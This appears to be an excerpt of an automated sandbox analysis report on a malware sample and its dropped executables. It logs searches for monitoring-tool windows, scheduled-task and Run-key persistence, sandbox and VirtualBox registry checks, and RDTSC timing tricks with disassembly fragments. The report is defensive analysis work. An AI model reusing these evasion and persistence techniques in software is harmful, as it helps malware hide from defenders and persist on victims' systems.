Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3e169c0a7e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3e169c0a7e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7fb3e2a1d2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7fb3e2a1d2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da069a4b00.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da069a4b00.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fe40c3a9a8.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fe40c3a9a8.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-11494
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_2-9970

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EB46 second address: 92EB50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6204BE6476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EB50 second address: 92EB5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F620450A746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB30F2 second address: AB3104 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jbe 00007F6204BE64A0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3104 second address: AB3126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A758h 0x00000009 popad 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB36E6 second address: AB36F7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6204BE647Ch 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3856 second address: AB385C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB385C second address: AB3862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3862 second address: AB3867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
